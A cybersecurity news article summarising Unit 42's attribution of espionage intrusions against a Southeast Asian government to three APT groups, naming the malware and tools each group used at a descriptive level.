A series of attacks targeting a Southeast Asian government has been found to be carried out by distinct threat actors affiliated with Chinese interests, according to Unit 42, the Palo Alto research arm closely studying the attacks.\n\nInitially thought to be carried out by a single threat actor, the attacks are now said to have been carried out by three separate threat actors with activities grouped into different clusters, sometimes occurring simultaneously. \n\nThe operation was found to be nation-state cyberespionage, in which multiple critical government entities of one country were compromised. Unit 42 did not disclose the name of the Southeast Asian country targeted by the attacks.\n\n\u201cThe techniques and tools observed during the attacks, along with the persistent long-term surveillance efforts made by the different attackers, suggest the work of advanced persistent threats (APTs),\u201d Unit 42 said in a blog post. \u201cIn our analysis, we were able to attribute the three clusters to known APT groups with different levels of confidence.\u201d\n\nThe APT groups attributed in the post include Stately Taurus (aka Mustang Panda), Alloy Taurus (aka GALLIUM), and Gelsemium.\n\nChinese APTs stole credentials\n\nBoth Stately Taurus and Alloy Taurus are believed to be APT groups operating on behalf of Chinese State interests. In this case, they are believed to have backdoor-ed victim systems to gain entry and use the infection to carry out reconnaissance, credential stealing, and persistence.\n\n\u201cWith moderate-high confidence, we conclude that (one cluster of) activity is linked to the Chinese cyberespionage group Stately Taurus,\u201d Unit 42 said. \u201cThis attribution is underpinned by the utilization of distinctive, rare tools such as the ToneShell backdoor that have not been publicly documented in association with any other known threat actor.\u201d\n\nAdditionally, the blog attributed Alloy Taurus \u201cwith a moderate level of confidence\u201d for another cluster of multiwave intrusions capitalizing on vulnerabilities in Exchange Servers to deploy a large number of web shells.\n\nThe APTs conducted reconnaissance on the breached networks using different tools including the Chinese open source scanning framework LadonGo,\u00a0IP scanner NBTScan, command-line tool ADFind, and Impacket. For credential stealing, the miscreants used credential harvesting tools such as Hdump, MimiKatz, and DCSync.\n\nAfter the initial infection, the state actors attempted to install other tools and malware to maintain a foothold in the environment and establish persistence. The tools they used for this included penetration testing beacon Cobalt Strike, and Quasar remote access Trojan (RAT) malware. They also used SSH tunneling through command line action tools PuTTY Link and HTran.\n\nRare Backdooring by Gelesium APT\n\nWith a \u201cmoderate level of confidence,\u201d Unit 42 attributed a third cluster to the Gelsemium group, not linked to any specific state, installing a rare combination of attacks.\n\n\u201cThis assessment is based on the unique combination of malware that attackers used, namely the SessionManager IIS backdoor and OwlProxy,\u201d Unit 42 said. \u201cThe cluster featured a combination of rare tools and techniques that the threat actor leveraged to gain a clandestine foothold and collect intelligence from sensitive servers belonging to a government entity in Southeast Asia.\u201d\n\nThreat actors responsible for the attacks in this cluster gained initial access to the environment by installing several web shells on a compromised web server, Unit 42 said. These web shells include reGeorg, China Chopper, and AspxSpy web shell. Previous research confirms that the Gelsemium threat group has targeted the government sector in Southeast Asia in the past, Unit 42 added.